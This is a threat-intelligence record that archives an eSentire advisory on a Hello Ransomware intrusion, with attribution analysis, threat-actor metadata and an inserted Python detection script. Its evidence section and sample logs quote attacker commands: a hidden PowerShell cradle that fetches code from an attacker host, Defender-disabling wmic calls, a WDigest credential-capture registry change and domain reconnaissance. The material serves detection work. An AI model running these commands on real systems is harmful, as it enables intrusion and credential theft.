{
	"id": "4b8e7bf5-0cfd-4b30-9b3b-4032f216648e",
	"created_at": "2026-04-06T00:10:01.453106Z",
	"updated_at": "2026-04-10T03:38:20.69279Z",
	"deleted_at": null,
	"sha1_hash": "1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64",
	"title": "Ransomware Hackers Attack a Top Safety Testing Org. Using Tactics and Techniques Borrowed from Chinese Espionage Groups",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 418813,
	"plain_text": "Ransomware Hackers Attack a Top Safety Testing Org. Using Tactics and Techniques Borrowed from Chinese Espionage Groups\r\nArchived: 2026-04-05 17:40:06 UTC\r\nExecutive Summary\r\nIn late July, eSentire, a global provider of Managed Detection and Response services, disrupted a cyberattack in midstream, in which hackers had obtained hands-on-keyboard access to a product safety testing organization’s network through a vulnerable web server. Because the testing company evaluates hundreds of products from around the globe, it houses a lot of intellectual property, making it a very desirable victim.\r\nAs eSentire’s security research team, the Threat Response Unit (TRU), began to investigate the incident, they discovered some very curious findings, relating both to the threat group behind the attack and to the tools and techniques used in the attack.\r\nInterestingly, the cyber gang which launched the attack mimicked much of the modus operandi (MO) of the infamous Chinese cyber espionage group Emissary Panda (a.k.a. APT27), or of a threat group closely associated with Emissary Panda. For example, several of the infiltration tools used in this incident have been seen in past cyberattacks attributed to Chinese cyber groups.\r\nOf course, the attack could be part of a false flag campaign. The attack chain borrows from publicly disclosed Chinese nation-state tools and procedures, including a SharePoint exploit and the use of a popular web shell called China Chopper. 
Additionally, the Hello Ransomware, which the threat group is known to deploy into victims’ environments, does not appear to have a leak site or blog, and the ransomware is not delivered under a typical Ransomware-as-a-Service model.\r\nThe perceived low quality of the ransomware and the lack of any known ransomware breaches by Hello Ransomware, combined with the threat group’s use of intrusion and reconnaissance methods typically associated with sophisticated actors, raise the question of whether the ransomware is the primary goal of the operators. Or are the cybercriminals dropping ransomware into their target victims’ IT environment simply to distract from their real motive: cyber espionage?\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 1 of 8\r\nKey Points:\r\nThe attack occurred at a product safety testing organization. This attack was stopped early in the infection chain and attackers did not get beyond initial intrusion actions; no ransomware deployment was observed.\r\nTechnical details and timeline are included in this document for detection opportunities.\r\nTactics, Techniques, and Procedures (TTPs) match recent Hello Ransomware campaigns and portions of the attack bear a resemblance to Chinese state-actor techniques:\r\nInitial access occurred on a SharePoint Server.\r\nPowerShell was masquerading as kaspersky via the Set-Alias command. Kaspersky is a well-known anti-virus provider.\r\nThe threat actors carried out post-compromise domain reconnaissance and showed interest in Microsoft Exchange.\r\nTime delays between reconnaissance activity were consistent with a threat actor issuing real-time commands.\r\nThreat actors used Mimikatz (a credential theft tool) and Cobalt Strike (an intrusion framework) wrapped in Metasploit (an exploitation framework).\r\nThreat actors 
attempted to disable endpoint monitoring.\r\nInfrastructure naming conventions bear a similarity to IOCs in previous Hello Ransomware incidents.\r\nIncident\r\neSentire's machine learning PowerShell classifier detected a Cobalt Strike beacon deployment at a product safety testing company. Threat actors attempted to masquerade the PowerShell command execution of the beacon as a Kaspersky service, attempting to bypass security controls such as application whitelisting. The payload was delivered as a Metasploit payload, implying that a vulnerability was present on the target’s perimeter and was exploited. Further investigation revealed that the target’s compromised server was hosting an out-of-date version of the Windows operating system and a vulnerable SharePoint instance. Both initial access and post-compromise behavior of this attack have previously been observed in recent Hello Ransomware incidents and resemble attack chains previously attributed to Chinese nation-state actors such as Emissary Panda and/or UNC215. Emissary Panda (referred to as APT27 by the U.S. federal government) is a well-known Chinese cyberespionage group which has been active since 2010. Historically, they have targeted government, defense, technology, energy, aerospace and various manufacturing sectors, including being credited with the breach of several U.S. defense contractors in 2010, where they reportedly stole terabytes of data. Interestingly, until 2020, Emissary Panda's primary focus appeared to be cyber espionage and intelligence gathering. However, since then several security research groups have linked Emissary Panda to multiple ransomware attacks [1][2][3][4][5]. 
FireEye recently published a report stating they had not observed activity from Emissary Panda since 2015, challenging the notion that Emissary Panda was involved in recent ransomware attacks.\r\nEvidence from this incident is presented in the Evidence section below and can be helpful for building detection rules.\r\nNot a Ransomware-as-a-Service\r\nHello Ransomware incidents (including the attack against the testing company) have demonstrated several markers of a typical ransomware intrusion, and yet have some distinct characteristics. First, the Hello Ransomware is not known to use an affiliate or service model. No leak site for Hello Ransomware has been observed by eSentire’s Threat Response Unit (TRU). Secondly, the four-year history of Hello Ransomware raises many questions. A variant of Hello Ransomware first appeared on the scene in 2017, copying heavily from the publicized WannaCry ransom note, including the phrase “But you have not so enough time”. Security researchers subsequently found that several other ransom notes used similar verbiage and formatting from the original WannaCry ransomware note. Linguists who analyzed the WannaCry ransom note in 2017 attributed the note to Chinese speakers. Law enforcement agencies from around the globe, as well as top security researchers, determined that WannaCry was the creation of the infamous hacking group the Lazarus Group, also known as APT38, which is known to work at the behest of the North Korean government. In February 2021, the U.S. Department of Justice announced the indictment of three men they allege are members of units of the Reconnaissance General Bureau (RGB), a military intelligence agency of the Democratic People’s Republic of Korea (DPRK). 
The North Korean military hacking units are more commonly known in the cybersecurity community as Lazarus Group or Advanced Persistent Threat 38 (APT38). The indictment went on to say that \"the three defendants were members of units of the RGB and were at times stationed by the North Korean government in other countries, including China and Russia.\"\r\nInterestingly, the encryption software used to create Hello Ransomware was only available in two languages in 2017: English and Russian. It is not clear whether the 2017 variant of Hello Ransomware and the current variant are part of the same operation. In 2017, Hello Ransomware charged a flat rate of 0.05 Bitcoin (~$200 USD at the time), but an associated wallet (17pXroP4MruitJzpTa88FAPAGD5q5QAPzb) has no transaction history. The Hello Ransomware operators have since updated their ransom letter template and no longer have a fixed fee. In place of a wallet address, in 2021 the operators began using the anonymous email services ProtonMail and Tutanota, as well as the messaging app WickrMe, to communicate with their victims.\r\nThe time from exploitation to hands-on activity was 15 minutes in the incident observed by TRU. The perceived low quality of the ransomware, next to the experienced intrusion methods, raises the question of whether the ransomware is the primary goal of the operators.\r\nFinally, the attack chain borrows from known Chinese nation-state tools and procedures (Figure 1) [5], including the SharePoint exploit and China Chopper. The Hello Ransomware’s evasion techniques can be traced back to Chinese pentesting blogs (such as websec30 and Leticia’s Blog) in early 2021.\r\nFigure 1: Hello Ransomware TTP chain observed by TRU (grey tombstones) compared to TTPs observed by other security organizations (e.g., red = Trend Micro) in separate attacks deploying China Chopper via a SharePoint exploit. 
The lighter colors represent a weak match between techniques and procedures while darker colors represent stronger matches.\r\nAttribution Avoidance\r\nIn incidents with similar features observed by Palo Alto’s research team, Unit 42, they note similarities to campaigns previously attributed to Emissary Panda but hesitate to draw conclusions:\r\n“The overlaps between these two sets of attacks include exploitation of a common vulnerability, similar toolset and a shared government victimology, but no strong pivot points to connect these attack campaigns together.” [1]\r\nPalo Alto’s analysis did not include any mention of Hello Ransomware. Similarly, TRU has no strong evidence connecting Chinese espionage groups and Hello Ransomware, only an overlap in the techniques and tools used. There are several scenarios that could explain this observation, including: evolution of China’s cybercrime economy, national interest in ransomware, or a non-Chinese group intentionally adopting Chinese tactics to mislead analysis.\r\nReinforcing the attribution uncertainty, recent analysis by FireEye suggests the 2019 SharePoint exploitation campaigns attributed to Emissary Panda by Palo Alto were operated by another Chinese espionage group, UNC215, that may or may not have a direct association with Emissary Panda [5].\r\nPointing Fingers: China and Ransomware in 2021\r\nThe topic of China in the ransomware market is an emerging interest, but understanding the implications isn’t so straightforward. For example, U.S. accusations are related to the exploitation of Microsoft Exchange (ProxyLogon) by the Chinese espionage group Hafnium. 
However, it’s likely that Hafnium only provided the foothold and other threat actors independently deployed ransomware such as DearCry.\r\nHistorically, espionage groups like Emissary Panda have been known to pursue nation-state interests, as opposed to the financial interests that are more common to ransomware threat groups. Use of ransomware by an espionage group could indicate a shift to financial motivations and could also serve as a cover for larger-scale espionage operations. On the other hand, the operators behind Hello Ransomware could be unrelated to espionage or national interests, or have a more convoluted and permissive relationship with Chinese national interests, similar to how Westerners perceive relationships between Russian cybercriminals and state agencies.\r\nAt least two countries and one security company loyal to Russian national interests have accused China of participating in the booming ransomware market. Most recently (July 2021), the Biden administration claimed that China participated in ransomware extortion campaigns against U.S. companies [6]. Before that (May 2021), Taiwan accused China’s Winnti threat group of participating in a ransomware attack on Taiwanese oil infrastructure [7]. At the end of 2020, Positive Technologies (a Russian IT company) attributed an attack to Emissary Panda that used a unique ransomware strain, which Positive Technologies dubbed Polar Ransomware [8]. This was detailed by Security Joes [2] in a report highlighting China’s interest in ransomware (Figure 2). Positive Technologies has since been accused by the U.S. of supporting Russian state interests and was named in sanctions against Russia [9].\r\nUltimately, the threat landscape around nation states and their relationships with domestic cybercriminals is an area of low transparency. 
The potential Russian origins of the application used to build the 2017 version of Hello Ransomware and the replication of known Chinese linguistics in the 2017 ransom note imply that the operators might be intentionally adopting known Chinese tactics to mislead attribution efforts.\r\nFigure 2: History of research associating China with ransomware. Image copied from Security Joes’ report [2].\r\nEvidence\r\nFollowing are the technical details of the attack, as well as corresponding references to external observations of the same techniques and tools.\r\nSuspected Exploit and Web Shell Activity\r\nAt the same moment that a malicious PowerShell call was observed spawning from the SharePoint IIS process, an external IP posted to Picker.aspx, as observed in previous SharePoint exploits:\r\nPOST /_layouts/15/Picker.aspx\r\nMasquerading as Kaspersky:\r\nUpon execution of the webshell, a PowerShell script fired, using the Set-Alias command to masquerade Invoke-Expression (IEX) as kaspersky, a tactic employed in previous Hello Ransomware incidents as reported by TrendMicro [4]. 
The payload domain and directories from this incident (see the command below) also shared infrastructure naming conventions and domain with those incidents (Figure 3):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c powershell.exe -nop -w hidden set-alias -name kaspersky -value Invoke-Expression; kaspersky(New-Object Net.WebClient).DownloadString('https://micoo.dnsrd[.]com/css/s.css')\r\nAdditional download strings embedded in the same masqueraded PowerShell call (indicators defanged):\r\nDownloadString('http://micoo.dnsrd[.]com/css/t.css')\r\nDownloadString('http://80.92.205[.]55/css/i.css')\r\nCompared to infrastructure observed by TrendMicro:\r\nFigure 3: Screenshot of payload download sites observed by TrendMicro [4]. Compare to what TRU observed in the command above.\r\nCobalt Strike Injecting Mimikatz into svchost\r\nInjection into svchost has been attributed to Emissary Panda previously [2] and is noted as a Chinese APT TTP [5], but also appears in a publicly available Cobalt Strike profile [11].\r\nsvchost.exe -k wksvc\r\nC:\\Windows\\sysnative\\svchost.exe -k wksvc called \"NtProtectVirtualMemory\"\r\nPrivilege escalation attempt via named pipe (Mimikatz):\r\nPrivilege escalation was attempted, consistent with observations by Unit 42 in previous Hello Ransomware incidents [1]. The echo-to-named-pipe pattern below is also how Cobalt Strike’s getsystem command performs named pipe impersonation, so on its own it does not identify which tool issued it.\r\ncmd.exe /c echo \u003cid\u003e \u003e \u003cPipe Address\u003e\r\nAttempt to disable security monitoring:\r\nVia Windows Management Instrumentation (wmic /node against a target host), another PowerShell call is deployed in a failed attempt to disable Microsoft Defender’s potentially unwanted application protection, real-time monitoring and behavior monitoring via Set-MpPreference. 
This command was similarly observed in previous Hello Ransomware incidents [3].\r\nwmic /node:\u003chost\u003e process call create \"powershell -c Set-MpPreference -PUAProtection disable;Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableBehaviorMonitoring $true\"\r\nCredential Scraping (Mimikatz):\r\nFinally, the system is configured for credential capture: the WDigest UseLogonCredential registry value is set to 1, which makes LSASS keep clear-text credentials for future logons so that Mimikatz can harvest them later. Mimikatz is a known tool of Emissary Panda [12] and UNC215 [5]. Emissary Panda is known to use a variant called Wrapikatz that wraps Mimikatz in a loader with defense evasion. This procedure could be consistent with the attempts at masquerading and defense disabling that preceded this malicious registry update, but it’s impossible to tell what implementation of Mimikatz was used.\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nDomain Reconnaissance with Interest in Exchange\r\nA common implementation of reconnaissance tactics in today’s threat landscape is to automatically attempt to collect all the domain information available. We hypothesize that this information is automatically collected and sent back to intruders, allowing them to review successful footholds across their orchestration platform. 
This information helps bad actors assess the value of the company and the cost of obtaining domain admin privileges. In this case, however, domain reconnaissance commands had human-scale delays between them (Figure 4), like those measured by Palo Alto’s Unit 42 [1].\r\nFigure 4: Time delays between post-compromise commands and Mimikatz injections observed by TRU imply a human cadence.\r\nIn this incident Exchange servers were targeted during post-compromise reconnaissance.\r\nChina Chopper is a known tool of espionage groups (including Emissary Panda) [5][13], and TrendMicro has reported seeing China Chopper in previous Hello Ransomware incidents [4], while FireEye notes its usage by UNC215 [5].\r\nPost Compromise Reconnaissance\r\nDomain trust discovery:\r\ncmd.exe /C nltest /domain_trusts\r\nQueries the domain controller for the \"domain controllers\" group:\r\ncmd.exe /C net group \"domain controllers\" /domain\r\nQueries the domain controller for the \"exchange servers\" group:\r\ncmd.exe /C net group \"exchange servers\" /domain\r\nQueries the domain controller for the \"domain computers\" group (no network connection observed):\r\ncmd.exe /C net group \"domain computers\" /domain\r\n\"domain admins\" group enumeration:\r\ncmd.exe /C net group \"domain admins\" /domain\r\nTime check and ping sprinkled throughout domain reconnaissance:\r\ncmd.exe /C net time /domain\r\ncmd.exe /C ping -n 1 -4 -a \u003cDC\u003e
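The detection opportunities above (the Set-Alias masquerade, the wmic Set-MpPreference tampering, the WDigest registry change, the echo-to-named-pipe pattern and the net group reconnaissance, including its human cadence), turned into working detection logic as an added example that is not part of the original advisory and is not eSentire's detection content. The pipe-delimited log layout, the host names, timestamps and cadence thresholds are assumptions made for illustration; the sample events are constructed from the command lines quoted above with indicators defanged.

```python
# Added example, not code from the eSentire advisory: a minimal detector for the
# command-line TTPs listed in the Evidence section, run over constructed
# process-creation events. The pipe-delimited log layout, host names, timestamps
# and cadence thresholds below are assumptions made for illustration.
import operator
import re
from datetime import datetime

# Each rule lists case-insensitive regex fragments that must ALL be present in
# one command line. The fragments mirror the commands quoted in the advisory;
# they are not eSentire's detection content.
RULES = {
    'iex_alias_masquerade': ['set-alias', 'invoke-expression|\\biex\\b'],
    'powershell_download_cradle': ['net\\.webclient', 'downloadstring'],
    'wmic_defender_tamper': ['wmic', 'process call create', 'set-mppreference', 'disable'],
    'wdigest_plaintext_enable': ['reg add', 'wdigest', 'uselogoncredential', '/d 1'],
    'named_pipe_impersonation': ['cmd\\.exe /c echo', '\\\\pipe\\\\'],
    'domain_recon': ['nltest /domain_trusts|net group \"[^\"]+\" /domain|net time /domain'],
}
COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats]
            for name, pats in RULES.items()}

# A median gap inside this window reads as a person typing commands; sub-second
# gaps read as a script. Assumed thresholds, not values from the advisory.
HUMAN_MIN_SECONDS = 2.0
HUMAN_MAX_SECONDS = 600.0


def parse_event(line):
    # Assumed layout: ISO-8601 timestamp | hostname | full command line
    ts, host, cmd = line.split('|', 2)
    return {'ts': datetime.strptime(ts.strip(), '%Y-%m-%dT%H:%M:%SZ'),
            'host': host.strip(), 'cmd': cmd.strip()}


def match_rules(cmd):
    # A rule fires only when every one of its fragments matches.
    return [name for name, pats in COMPILED.items()
            if all(p.search(cmd) for p in pats)]


def cadence_verdict(gaps):
    # Classify inter-command delays; needs at least one gap to say anything.
    if len(gaps) == 0:
        return 'insufficient'
    median = sorted(gaps)[len(gaps) // 2]
    if operator.ge(median, HUMAN_MIN_SECONDS) and operator.le(median, HUMAN_MAX_SECONDS):
        return 'human'
    return 'automated'


def analyze(lines):
    # Returns the rule hits per event plus, per host, the gaps between
    # domain reconnaissance commands and a cadence verdict for them.
    hits, recon_times = [], {}
    for line in lines:
        ev = parse_event(line)
        fired = match_rules(ev['cmd'])
        if fired:
            hits.append((ev['host'], fired, ev['cmd']))
        if 'domain_recon' in fired:
            recon_times.setdefault(ev['host'], []).append(ev['ts'])
    cadence = {}
    for host, times in recon_times.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        cadence[host] = {'gaps': gaps, 'verdict': cadence_verdict(gaps)}
    return {'hits': hits, 'cadence': cadence}


# Constructed sample events modelled on the advisory's command lines
# (indicators defanged, host names and times invented).
SAMPLE_LOG = [
    '''2021-07-28T13:47:03Z|SP-WEB01|\"C:\\Windows\\System32\\cmd.exe\" /c powershell.exe -nop -w hidden set-alias -name kaspersky -value Invoke-Expression; kaspersky(New-Object Net.WebClient).DownloadString('https://micoo.dnsrd[.]com/css/s.css')''',
    '2021-07-28T13:59:40Z|SP-WEB01|cmd.exe /c echo a1b2c3 \u003e \\\\.\\pipe\\a1b2c3',
    '2021-07-28T14:01:12Z|SP-WEB01|wmic /node:SP-WEB02 process call create \"powershell -c Set-MpPreference -PUAProtection disable;Set-MpPreference -DisableRealtimeMonitoring $true\"',
    '2021-07-28T14:01:55Z|SP-WEB01|reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f',
    '2021-07-28T14:02:11Z|SP-WEB01|cmd.exe /C nltest /domain_trusts',
    '2021-07-28T14:03:40Z|SP-WEB01|cmd.exe /C net group \"domain controllers\" /domain',
    '2021-07-28T14:05:02Z|SP-WEB01|cmd.exe /C net group \"exchange servers\" /domain',
    '2021-07-28T14:06:15Z|SP-WEB01|cmd.exe /C net time /domain',
    '2021-07-28T14:06:16Z|SP-WEB01|cmd.exe /C ping -n 1 -4 -a DC01',
    '2021-07-28T14:10:00Z|SP-WEB01|svchost.exe -k netsvcs',
]

if __name__ == '__main__':
    report = analyze(SAMPLE_LOG)
    for host, fired, cmd in report['hits']:
        print(host, ', '.join(fired), cmd[:70])
    for host, info in report['cadence'].items():
        print(host, 'recon gaps (s):', info['gaps'], 'verdict:', info['verdict'])
```

In practice the lines would come from Sysmon Event ID 1 or Windows Security Event 4688 command-line fields rather than the constructed list. Every rule requires all of its fragments, so a lone net group or a lone Set-MpPreference call from an administrator does not fire by itself; the cadence verdict is reported separately from the rule hits because, as the advisory notes, the timing is evidence of a hands-on operator rather than an indicator in its own right.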
References:\r\n[1] https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\r\n[2] https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf\r\n[3] https://cncs.gob.do/ransomware-hello-wickrme/\r\n[4] https://www.trendmicro.com/en_ca/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\n[5] https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\r\n[6] https://www.nbcnews.com/tech/tech-news/us-accuses-china-abetting-ransomware-attack-rcna1448\r\n[7] https://www.cyberscoop.com/cpc-ransomware-winnti-taiwan-china/\r\n[8] https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\n[9] https://home.treasury.gov/news/press-releases/jy0127\r\n[10] https://twitter.com/GossiTheDog/status/1227319811685875715\r\n[11] https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\r\n[12] https://attack.mitre.org/groups/G0027/\r\n[13] https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/\r\nSource: https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups"
	],
	"report_names": [
		"ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "274f04ff-fae8-4e90-bcf5-3e391a860cd5",
			"created_at": "2023-12-08T02:00:05.75114Z",
			"updated_at": "2026-04-10T02:00:03.493837Z",
			"deleted_at": null,
			"main_name": "UNC215",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC215",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ea34919f-9093-4e34-b9de-a37ab9b4d5c4",
			"created_at": "2022-10-25T16:07:24.35727Z",
			"updated_at": "2026-04-10T02:00:04.952883Z",
			"deleted_at": null,
			"main_name": "UNC215",
			"aliases": [],
			"source_name": "ETDA:UNC215",
			"tools": [
				"AdFind",
				"CHINACHOPPER",
				"China Chopper",
				"FOCUSFJORD",
				"HighShell",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Mimikatz",
				"NBTscan",
				"ProcDump",
				"PsExec",
				"SEASHARPEE",
				"SinoChopper",
				"SysUpdate",
				"TwoFace",
				"WHEATSCAN",
				"WinRAR",
				"certutil",
				"certutil.exe",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
